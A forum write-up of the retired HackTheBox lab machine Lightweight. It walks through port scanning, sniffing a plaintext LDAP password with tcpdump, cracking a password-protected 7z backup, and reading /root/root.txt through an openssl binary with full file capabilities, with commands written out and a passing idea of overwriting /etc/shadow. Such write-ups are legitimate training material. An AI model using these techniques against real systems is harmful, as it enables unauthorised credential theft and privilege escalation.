HackTheBox LIghtweight write-up

#1

HackTheBox Lightweight

Heyo nullers :smiley:
Welcome to my writeup for the recently retired box Lightweight from HackTheBox.
Lightweight was tricky at the beginning. In general, it had:

  • Packet sniffing
  • LDAP Authentication
  • Files’ capabilites

Portscan:
Nmap showed three open ports, i.e. ssh, http and ldap

Nmap scan report for 10.10.10.119
Host is up (0.61s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (EdDSA)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time

On port 80:

Imgur

The user page prompt me to login via ssh with my IP as username and password.
So after doing that and taking a hint from @pry0cc and @guly I just “listened” to the box for as long as I had to. I ran tcpdump -i lo -A -w inter.pcap on the Lightweight box and then I just browsed the webpage. The status.php was taking quite a time to load, so that was suspicious.

After browsing the website enough, I moved the pcap file to /tmp and transfered it to my local computer with scp [email protected]:/tmp/inter.pcap .

Opening the file with wireshark, we find that there is an ldap “bind request” from ldapuser2 with simple authentication, meaning that the ldapuser2’s password was in plain sight.

By using it we su to ldapuser2 we get the user flag.

su ldapuser2
Password: 
[[email protected] ~]$ ls
backup.7z  OpenLDAP-Admin-Guide.pdf  OpenLdap.pdf  user.txt
[[email protected] ~]$  cat user.txt
8a866d3b*******************

In ldapuser2’s home directory we find a backup.7z file. I transfered it to my local machine like the pcap file only to find out that it was password protected. There I used a script I found here which uses john to bruteforce the 7z file. The password was delete

There I found some php files, which are the same from the website, only with a twist:
after running cat * | grep user in a desparate move for something valueable, I found that the user is ldapuser1,

[email protected]:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep username
$username = 'ldapuser1';

so the next logical thing to do is to run cat * | grep password, where we find the ldapuser1’s password

[email protected]:~/Desktop/CTF/HTB/Lightweight/backup$ cat * | grep password
$password = 'f3ca9d298a553da117442deeb6fa932d';
if ($bind=ldap_bind($ds, $dn, $password)) {
...
...

Escalating to ldapuser1, like previously with ldapuser2.

[[email protected] ~]$ su ldapuser1
Password: 
[[email protected] ldapuser2]$ whoami
ldapuser1

There, root got a bit spoiled to me, because some people where giving away clues inside the box. Specific, one broadcasted the message “openssl is the key”. Kind of a bummer but finding two binaries on the home directory was meaning that the way for root had to do with one of them. So the spoil just saved me a rabbithole. But, please, don’t spoil things.

I enumerated the openssl binary I had in front of me. After examing it’s capabilities with getcap -r openssl the output was openssl =ep, which means that it had access to anything.

So to get the root.txt file, one must grab it with openssl, encrypt it and paste it in a directory, then decrypt it to read it, like /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root and then base64 -d enc_root.
And there is the sweet root flag :smiley:

[[email protected] ~]$ /home/ldapuser1/openssl enc -base64 -in /root/root.txt -out enc_root
[[email protected] ~]$ base64 -d enc_root
f1d4e309c*******************

PS: As @PresComm once said: “But if you don’t get a shell and can’t run code, is a system really owned? :thinking:”.
Searching for some way to get a root shell I came across this article, where one can rewrite the /etc/shadow file.

vict0ni

3 Likes

#2

maybe sudoers, instead of brickin shadow file ?

1 Like